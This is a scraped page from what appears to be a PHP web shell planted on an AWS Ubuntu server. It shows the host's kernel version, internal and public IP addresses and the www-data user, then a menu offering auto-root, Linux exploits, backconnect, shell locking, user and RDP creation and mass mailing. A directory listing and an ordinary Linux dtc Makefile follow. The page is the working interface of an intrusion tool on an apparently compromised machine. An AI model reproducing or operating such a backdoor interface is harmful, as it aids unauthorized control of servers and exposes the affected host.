Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.231.160
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-1101-aws /
scripts /
dtc /
[ HOME SHELL ]
Name
Size
Permission
Action
libfdt
[ DIR ]
drwxr-xr-x
Makefile
1018
B
-rw-r--r--
Makefile.dtc
467
B
-rw-r--r--
checks.c
49.13
KB
-rw-r--r--
data.c
4.48
KB
-rw-r--r--
dt_to_config
40.81
KB
-rwxr-xr-x
dtc-lexer.l
6.14
KB
-rw-r--r--
dtc-parser.y
10.48
KB
-rw-r--r--
dtc.c
9.19
KB
-rw-r--r--
dtc.h
8.26
KB
-rw-r--r--
dtx_diff
8.58
KB
-rwxr-xr-x
fdtdump.c
3.67
KB
-rw-r--r--
fdtget.c
7.92
KB
-rw-r--r--
fdtput.c
7.69
KB
-rw-r--r--
flattree.c
21.44
KB
-rw-r--r--
fstree.c
1.52
KB
-rw-r--r--
livetree.c
20.34
KB
-rw-r--r--
srcpos.c
8.57
KB
-rw-r--r--
srcpos.h
2.88
KB
-rw-r--r--
treesource.c
6.89
KB
-rw-r--r--
update-dtc-source.sh
2.5
KB
-rwxr-xr-x
util.c
8.47
KB
-rw-r--r--
util.h
6.85
KB
-rw-r--r--
version_gen.h
42
B
-rw-r--r--
yamltree.c
6.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # scripts/dtc makefile hostprogs-$(CONFIG_DTC) := dtc always := $(hostprogs-y) dtc-objs := dtc.o flattree.o fstree.o data.o livetree.o treesource.o \ srcpos.o checks.o util.o dtc-objs += dtc-lexer.lex.o dtc-parser.tab.o # Source files need to get at the userspace version of libfdt_env.h to compile HOST_EXTRACFLAGS += -I $(srctree)/$(src)/libfdt ifeq ($(shell pkg-config --exists yaml-0.1 2>/dev/null && echo yes),) ifneq ($(CHECK_DTBS),) $(error dtc needs libyaml for DT schema validation support. \ Install the necessary libyaml development package.) endif HOST_EXTRACFLAGS += -DNO_YAML else dtc-objs += yamltree.o HOSTLDLIBS_dtc := $(shell pkg-config yaml-0.1 --libs) endif # Generated files need one more search path to include headers in source tree HOSTCFLAGS_dtc-lexer.lex.o := -I $(srctree)/$(src) HOSTCFLAGS_dtc-parser.tab.o := -I $(srctree)/$(src) # dependencies on generated files need to be listed explicitly $(obj)/dtc-lexer.lex.o: $(obj)/dtc-parser.tab.h
Close